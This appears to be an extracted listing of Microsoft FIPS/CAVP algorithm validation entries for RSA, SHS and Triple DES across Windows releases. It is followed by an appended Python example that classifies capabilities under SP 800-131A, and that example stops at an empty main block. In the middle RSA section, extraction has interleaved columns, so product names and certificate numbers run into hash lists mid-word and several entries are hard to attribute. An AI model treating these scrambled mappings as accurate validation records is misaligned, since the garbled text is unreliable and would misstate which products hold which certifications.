Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Enhanced Cryptographic Provider (RSAENH) #1132
  FIPS186-2:
  ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Values: 65537 DRBG: #258
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , SHS: SHA-256#1902, SHA-384#1902, SHA-512#1902,
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1#1902, SHA-256#1902, SHA-384#1902, SHA-512#1902,
  Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical RSA List Val#1132.

Windows Embedded Compact 7 Enhanced Cryptographic Provider (RSAENH) #1052
  FIPS186-2:
  ALG[ANSIX9.31]: SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#1774
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , SHS: SHA-256Val#1774, SHA-384Val#1774, SHA-512Val#1774,
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#1774, SHA-256Val#1774, SHA-384Val#1774, SHA-512Val#1774,
  Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical RSA List Val#1052.

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #1051
  FIPS186-2:
  ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Values: 65537 DRBG: Val# 193
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , SHS: SHA-256Val#1773, SHA-384Val#1773, SHA-512Val#1773,
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#1773, SHA-256Val#1773, SHA-384Val#1773, SHA-512Val#1773,
  Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical RSA List Val#1051.

Windows Server 2008 R2 and SP1 Enhanced Cryptographic Provider (RSAENH) #568
  FIPS186-2:
  ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , SHS: SHA-256Val#1081, SHA-384Val#1081, SHA-512Val#1081,
  SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-1Val#1081, SHA-256Val#1081, SHA-384Val#1081, SHA-512Val#1081,
  Some of the previously validated components for this validation have been removed because they are now non-compliant per the SP800-131A transition. See Historical RSA List Val#568.

FIPS186-2: Windows Server 2008 R2 and SP1 CNG algorithms #567


ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#1081, SHA-384Val#1081, SHA- Windows 7 and SP1 CNG algorithms #560
512Val#1081,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#1081, SHA-256Val#1081, SHA-384Val#1081, SHA-
512Val#1081,
ALG[RSASSA-PSS]: SIG(gen); 2048 , 3072 , 4096 , SHS: SHA-
256Val#1081, SHA-384Val#1081, SHA-512Val#1081
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#1081, SHA-256Val#1081, SHA-384Val#1081, SHA-
512Val#1081
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#567. See Historical RSA List Val#560.

FIPS186-2: Windows 7 and SP1 and Server 2008 R2 and SP1 RSA Key
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Generation Implementation #559
Values: 65537 DRBG: Val# 23
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#559.

FIPS186-2: Windows 7 and SP1 Enhanced Cryptographic Provider


ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , (RSAENH) #557
SHS: SHA-256Val#1081, SHA-384Val#1081, SHA-
512Val#1081,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#1081, SHA-256Val#1081, SHA-384Val#1081, SHA-
512Val#1081,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#557.
FIPS186-2: Windows Server 2003 SP2 Enhanced Cryptographic Provider
ALG[ANSIX9.31]: (RSAENH) #395
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#816, SHA-384Val#816, SHA-512Val#816,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#816, SHA-256Val#816, SHA-384Val#816, SHA-
512Val#816,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#395.

FIPS186-2: Windows XP Professional SP3 Enhanced Cryptographic


ALG[ANSIX9.31]: Provider (RSAENH) #371
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#783
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#783, SHA-384Val#783, SHA-512Val#783,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#371.

FIPS186-2: Windows Server 2008 CNG algorithms #358


ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#753, SHA-384Val#753, SHA-512Val#753, Windows Vista SP1 CNG algorithms #357
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#753, SHA-256Val#753, SHA-384Val#753, SHA-
512Val#753,
ALG[RSASSA-PSS]: SIG(gen); 2048 , 3072 , 4096 , SHS: SHA-
256Val#753, SHA-384Val#753, SHA-512Val#753
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#753, SHA-256Val#753, SHA-384Val#753, SHA-
512Val#753
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#358. See Historical RSA List Val#357.

FIPS186-2: Windows Server 2008 Enhanced Cryptographic Provider


ALG[ANSIX9.31]: (RSAENH) #355
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#753 Windows Vista SP1 Enhanced Cryptographic Provider
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , (RSAENH) #354
SHS: SHA-256Val#753, SHA-384Val#753, SHA-512Val#753,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#753, SHA-256Val#753, SHA-384Val#753, SHA-
512Val#753,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#355. See Historical RSA List Val#354.

FIPS186-2: Windows Vista SP1 and Windows Server 2008 RSA Key
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Generation Implementation #353
Values: 65537
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#353.
FIPS186-2: Windows Vista RSA key generation implementation #258
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey
Values: 65537 RNG: Val# 321
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#258.

FIPS186-2: Windows Vista CNG algorithms #257


ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#618, SHA-384Val#618, SHA-512Val#618,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#618, SHA-256Val#618, SHA-384Val#618, SHA-
512Val#618,
ALG[RSASSA-PSS]: SIG(gen); 2048 , 3072 , 4096 , SHS: SHA-
256Val#618, SHA-384Val#618, SHA-512Val#618
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#618, SHA-256Val#618, SHA-384Val#618, SHA-
512Val#618
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#257.

FIPS186-2: Windows Vista Enhanced Cryptographic Provider (RSAENH)


ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , #255
SHS: SHA-256Val#618, SHA-384Val#618, SHA-512Val#618,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#618, SHA-256Val#618, SHA-384Val#618, SHA-
512Val#618,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#255.

FIPS186-2: Windows Server 2003 SP2 Enhanced Cryptographic Provider


ALG[ANSIX9.31]: (RSAENH) #245
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#613
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#613, SHA-384Val#613, SHA-512Val#613,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#613, SHA-256Val#613, SHA-384Val#613, SHA-
512Val#613,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#245.

FIPS186-2: Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile


ALG[ANSIX9.31]: Enhanced Cryptographic Provider (RSAENH) #230
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#589
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#589, SHA-384Val#589, SHA-512Val#589,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#589, SHA-256Val#589, SHA-384Val#589, SHA-
512Val#589,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#230.
FIPS186-2: Windows CE and Windows Mobile 6 and Windows Mobile 6.1
ALG[ANSIX9.31]: Enhanced Cryptographic Provider (RSAENH) #222
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#578
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#578, SHA-384Val#578, SHA-512Val#578,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#578, SHA-256Val#578, SHA-384Val#578, SHA-
512Val#578,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#222.

FIPS186-2: Windows Server 2003 SP1 Enhanced Cryptographic Provider


ALG[RSASSA-PKCS1_V1_5]: (RSAENH) #81
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#364
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#81.

FIPS186-2: Windows CE 5.00 and Windows CE 5.01 Enhanced


ALG[ANSIX9.31]: Cryptographic Provider (RSAENH) #52
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#305
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256Val#305, SHA-384Val#305, SHA-512Val#305,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#305, SHA-256Val#305, SHA-384Val#305, SHA-
512Val#305,
Some of the previously validated components for this
validation have been removed because they are now non-
compliant per the SP800-131A transition. See Historical RSA
List Val#52.

FIPS186-2: Windows XP, vendor-affirmed


– PKCS#1 v1.5, signature generation and verification Windows 2000, vendor-affirmed
– Mod sizes: 1024, 1536, 2048, 3072, 4096
– SHS: SHA–1/256/384/512

Secure Hash Standard (SHS)

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

Microsoft Surface Hub SymCrypt Cryptographic Implementations #4011
Version 10.0.15063.674
SHA-1, SHA-256, SHA-384, SHA-512: Supports Empty Message

Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #4010
Version 10.0.15254
SHA-1, SHA-256, SHA-384, SHA-512: Supports Empty Message

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #4009
Version 10.0.16299
SHA-1, SHA-256, SHA-384, SHA-512: Supports Empty Message

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #3790
Version 10.0.15063
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #3652
Version 7.00.2872
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #3651
Version 8.00.6246
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #3649
Version 7.00.2872
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #3648
Version 8.00.6246
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update SymCrypt Cryptographic Implementations #3347
Version 10.0.14393
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update RSA32 Algorithm Implementations #3346
Version 10.0.14393
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub RSA32 Algorithm Implementations #3048
Version 10.0.10586
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub SymCrypt Cryptographic Implementations #3047
Version 10.0.10586
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 SymCrypt Cryptographic Implementations #2886
Version 10.0.10240
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 RSA32 Algorithm Implementations #2871
Version 10.0.10240
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Microsoft Windows 8.1, Microsoft Windows Server 2012 R2, Microsoft Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry RSA32 Algorithm Implementations #2396
Version 6.3.9600
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 SymCrypt Cryptographic Implementations #2373
Version 6.3.9600
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Next Generation Symmetric Cryptographic Algorithms Implementations (SYMCRYPT) #1903
Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Symmetric Algorithm Implementations (RSA32) #1902
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)
Implementation does not support zero-length (null) messages.

Windows Embedded Compact 7 Enhanced Cryptographic Provider (RSAENH) #1774
Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #1773
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows 7 and SP1 and Windows Server 2008 R2 and SP1 Symmetric Algorithm Implementation #1081
Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #816
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows XP Professional SP3 Kernel Mode Cryptographic Module (fips.sys) #785
Windows XP Professional SP3 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #784
SHA-1 (BYTE-only)

Windows XP Professional SP3 Enhanced Cryptographic Provider (RSAENH) #783
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Vista SP1 and Windows Server 2008 Symmetric Algorithm Implementation #753
Windows Vista Symmetric Algorithm Implementation #618
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Vista BitLocker Drive Encryption #737
Windows Vista Beta 2 BitLocker Drive Encryption #495
SHA-1, SHA-256 (BYTE-only)

Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #613
Windows Server 2003 SP1 Enhanced Cryptographic Provider (RSAENH) #364
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows Server 2003 SP2 Enhanced DSS and Diffie-Hellman Cryptographic Provider #611
Windows Server 2003 SP2 Kernel Mode Cryptographic Module (fips.sys) #610
Windows Server 2003 SP1 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #385
Windows Server 2003 SP1 Kernel Mode Cryptographic Module (fips.sys) #371
Windows Server 2003 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #181
Windows Server 2003 Kernel Mode Cryptographic Module (fips.sys) #177
Windows Server 2003 Enhanced Cryptographic Provider (RSAENH) #176
SHA-1 (BYTE-only)

Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile Enhanced Cryptographic Provider (RSAENH) #589
Windows CE and Windows Mobile 6 and Windows Mobile 6.5 Enhanced Cryptographic Provider (RSAENH) #578
Windows CE 5.00 and Windows CE 5.01 Enhanced Cryptographic Provider (RSAENH) #305
SHA-1, SHA-256, SHA-384, SHA-512 (BYTE-only)

Windows XP Microsoft Enhanced Cryptographic Provider #83
Crypto Driver for Windows 2000 (fips.sys) #35
Windows 2000 Microsoft Outlook Cryptographic Provider (EXCHCSP.DLL) SR-1A (3821) #32
Windows 2000 RSAENH.DLL #24
Windows 2000 RSABASE.DLL #23
Windows NT 4 SP6 RSAENH.DLL #21
Windows NT 4 SP6 RSABASE.DLL #20
SHA-1 (BYTE-only)

Triple DES

Modes / States / Key Sizes | Algorithm Implementation and Certificate #

Microsoft Surface Hub SymCrypt Cryptographic Implementations #2558
Version 10.0.15063.674
TDES-CBC, TDES-CFB64, TDES-CFB8, TDES-ECB: Modes: Decrypt, Encrypt; Keying Option: 1

Windows 10 Mobile (version 1709) SymCrypt Cryptographic Implementations #2557
Version 10.0.15254
TDES-CBC, TDES-CFB64, TDES-CFB8, TDES-ECB: Modes: Decrypt, Encrypt; Keying Option: 1

Windows 10 Home, Pro, Enterprise, Education, Windows 10 S Fall Creators Update and Windows Server, Windows Server Datacenter (version 1709); SymCrypt Cryptographic Implementations #2556
Version 10.0.16299
TDES-CBC, TDES-CFB64, TDES-CFB8, TDES-ECB: Modes: Decrypt, Encrypt; Keying Option: 1

Windows 10 Creators Update (version 1703) Home, Pro, Enterprise, Education, Windows 10 S, Windows 10 Mobile SymCrypt Cryptographic Implementations #2459
Version 10.0.15063
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; TCFB8( KO 1 e/d, ) ; TCFB64( KO 1 e/d, )

Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #2384
Version 8.00.6246
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, )

Windows Embedded Compact Enhanced Cryptographic Provider (RSAENH) #2383
Version 8.00.6246
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, )

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #2382
Version 7.00.2872
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; CTR ( int only )

Windows Embedded Compact Cryptographic Primitives Library (bcrypt.dll) #2381
Version 8.00.6246
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, )

Microsoft Windows 10 Anniversary Update, Windows Server 2016, Windows Storage Server 2016; Microsoft Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10 Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/ Windows 10 Mobile Anniversary Update SymCrypt Cryptographic Implementations #2227
Version 10.0.14393
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; TCFB8( KO 1 e/d, ) ; TCFB64( KO 1 e/d, )

Microsoft Windows 10 November 2015 Update; Microsoft Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface Pro 2, and Surface Pro w/ Windows 10 November 2015 Update; Windows 10 Mobile for Microsoft Lumia 950 and Microsoft Lumia 635; Windows 10 for Microsoft Surface Hub and Surface Hub SymCrypt Cryptographic Implementations #2024
Version 10.0.10586
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; TCFB8( KO 1 e/d, ) ; TCFB64( KO 1 e/d, )

Microsoft Windows 10, Microsoft Surface Pro 3 with Windows 10, Microsoft Surface 3 with Windows 10, Microsoft Surface Pro 2 with Windows 10, Microsoft Surface Pro with Windows 10 SymCrypt Cryptographic Implementations #1969
Version 10.0.10240
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; TCFB8( KO 1 e/d, ) ; TCFB64( KO 1 e/d, )

Windows Storage Server 2012 R2, Microsoft Windows RT 8.1, Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1, Microsoft Windows Embedded 8.1 Industry and Microsoft StorSimple 8100 SymCrypt Cryptographic Implementations #1692
Version 6.3.9600
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; TCFB8( KO 1 e/d, ) ; TCFB64( KO 1 e/d, )

Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Next Generation Symmetric Cryptographic Algorithms Implementations (SYMCRYPT) #1387
TECB( e/d; KO 1,2 ) ; TCBC( e/d; KO 1,2 ) ; TCFB8( e/d; KO 1,2 ) ; TCFB64( e/d; KO 1,2 )

Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 Symmetric Algorithm Implementations (RSA32) #1386
TECB( e/d; KO 1,2 ) ; TCBC( e/d; KO 1,2 ) ; TCFB8( e/d; KO 1,2 )

Windows 7 and SP1 and Windows Server 2008 R2 and SP1 Symmetric Algorithm Implementation #846
TECB( e/d; KO 1,2 ) ; TCBC( e/d; KO 1,2 ) ; TCFB8( e/d; KO 1,2 )

Windows Vista SP1 and Windows Server 2008 Symmetric Algorithm Implementation #656
TECB( e/d; KO 1,2 ) ; TCBC( e/d; KO 1,2 ) ; TCFB8( e/d; KO 1,2 )

Windows Vista Symmetric Algorithm Implementation #549
TECB( e/d; KO 1,2 ) ; TCBC( e/d; KO 1,2 ) ; TCFB8( e/d; KO 1,2 )

Triple DES MAC
Windows 8, Windows RT, Windows Server 2012, Surface Windows RT, Surface Windows 8 Pro, and Windows Phone 8 #1386, vendor-affirmed
Windows 7 and SP1 and Windows Server 2008 R2 and SP1 #846, vendor-affirmed

TECB( e/d; KO 1,2 ) ; TCBC( e/d; KO 1,2 )
Windows Embedded Compact 7 Enhanced Cryptographic Provider (RSAENH) #1308
Windows Embedded Compact 7 Cryptographic Primitives Library (bcrypt.dll) #1307
Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #691
Windows XP Professional SP3 Kernel Mode Cryptographic Module (fips.sys) #677
Windows XP Professional SP3 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #676
Windows XP Professional SP3 Enhanced Cryptographic Provider (RSAENH) #675
Windows Server 2003 SP2 Enhanced Cryptographic Provider (RSAENH) #544
Windows Server 2003 SP2 Enhanced DSS and Diffie-Hellman Cryptographic Provider #543
Windows Server 2003 SP2 Kernel Mode Cryptographic Module (fips.sys) #542
Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile Enhanced Cryptographic Provider (RSAENH) #526
Windows CE and Windows Mobile 6 and Windows Mobile 6.1 and Windows Mobile 6.5 Enhanced Cryptographic Provider (RSAENH) #517
Windows Server 2003 SP1 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #381
Windows Server 2003 SP1 Kernel Mode Cryptographic Module (fips.sys) #370
Windows Server 2003 SP1 Enhanced Cryptographic Provider (RSAENH) #365
Windows CE 5.00 and Windows CE 5.01 Enhanced Cryptographic Provider (RSAENH) #315
Windows Server 2003 Kernel Mode Cryptographic Module (fips.sys) #201
Windows Server 2003 Enhanced DSS and Diffie-Hellman Cryptographic Provider (DSSENH) #199
Windows Server 2003 Enhanced Cryptographic Provider (RSAENH) #192
Windows XP Microsoft Enhanced Cryptographic Provider #81
Windows 2000 Microsoft Outlook Cryptographic Provider (EXCHCSP.DLL) SR-1A (3821) #18
Crypto Driver for Windows 2000 (fips.sys) #16
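The SP800-131A transition that the "Historical RSA List" notes in the RSA table refer to is what shrinks every RSA SIG(gen) list above to 2048-bit and larger moduli with SHA-2 while SIG(ver) keeps 1024, 1536 and SHA-1, and what turns the older "KO 1,2" Triple DES entries into "KO 1" only in the newer ones. The Python below is an added example written for this page, not Microsoft code and not part of the CAVP tables; it encodes those transition rules (SP 800-131A Rev 1, key generation and signature tables, and the two-key Triple DES rule) and regenerates the surviving capability lists from the full grid the oldest entries advertise. The operation names, the Status values and the render format are this example's own choices.

```python
# Added example (not from the Microsoft validation tables): classify RSA and
# Triple DES capabilities under the SP 800-131A transition rules that the
# "Historical RSA List" notes refer to, then rebuild the surviving lists.
from enum import Enum


class Status(Enum):
    ACCEPTABLE = "acceptable"
    LEGACY_USE = "legacy-use"   # only for verifying/decrypting existing data
    DISALLOWED = "disallowed"


SHA1 = "SHA-1"
SHA2 = {"SHA-224", "SHA-256", "SHA-384", "SHA-512"}

# The full capability grid an older FIPS 186-2 RSA entry on this page advertises.
MODULI = (1024, 1536, 2048, 3072, 4096)
HASHES = ("SHA-1", "SHA-256", "SHA-384", "SHA-512")


def rsa_status(operation: str, modulus_bits: int, sha: str = "SHA-256") -> Status:
    """Classify one (modulus, hash) pair for 'keygen', 'siggen' or 'sigver'.

    SP 800-131A Rev 1: key generation and signature generation need
    |n| >= 2048 and a SHA-2 hash; signature verification keeps
    1024 <= |n| < 2048 and SHA-1 as legacy use; |n| < 1024 is out entirely.
    """
    if operation == "keygen":
        return Status.ACCEPTABLE if modulus_bits >= 2048 else Status.DISALLOWED
    if sha != SHA1 and sha not in SHA2:          # e.g. MD5: never approved
        return Status.DISALLOWED
    if operation == "siggen":
        if modulus_bits < 2048 or sha == SHA1:
            return Status.DISALLOWED
        return Status.ACCEPTABLE
    if operation == "sigver":
        if modulus_bits < 1024:
            return Status.DISALLOWED
        if modulus_bits < 2048 or sha == SHA1:
            return Status.LEGACY_USE
        return Status.ACCEPTABLE
    raise ValueError(f"unknown operation {operation!r}")


def tdes_status(keying_option: int, direction: str) -> Status:
    """Keying option 1 = three independent keys, 2 = two-key TDES (K1 == K3).

    SP 800-131A Rev 1: two-key TDES encryption is disallowed, two-key
    decryption is legacy use, three-key TDES is acceptable. (Rev 2 of 2019
    later restricts three-key encryption as well; not modelled here.)
    """
    if direction not in ("e", "d"):
        raise ValueError(f"direction must be 'e' or 'd', got {direction!r}")
    if keying_option == 1:
        return Status.ACCEPTABLE
    if keying_option == 2:
        return Status.LEGACY_USE if direction == "d" else Status.DISALLOWED
    raise ValueError(f"unknown keying option {keying_option}")


def surviving_rsa(operation: str):
    """(modulus, hash) pairs that may still be listed for the operation."""
    return [(m, h) for m in MODULI for h in HASHES
            if rsa_status(operation, m, h) is not Status.DISALLOWED]


def surviving_tdes(keying_options=(1, 2), directions=("e", "d")):
    """(keying option, direction) pairs that survive the transition."""
    return [(ko, d) for ko in keying_options for d in directions
            if tdes_status(ko, d) is not Status.DISALLOWED]


def render_rsa(operation: str) -> str:
    """Render the surviving grid in the same shape as the table entries."""
    pairs = surviving_rsa(operation)
    mods = ", ".join(str(m) for m in sorted({m for m, _ in pairs}))
    if operation == "keygen":                   # hash is irrelevant for keygen
        return f"keygen: {mods}"
    shas = ", ".join(h for h in HASHES if any(h == x for _, x in pairs))
    return f"{operation}: {mods}, SHS: {shas}"


if __name__ == "__main__":
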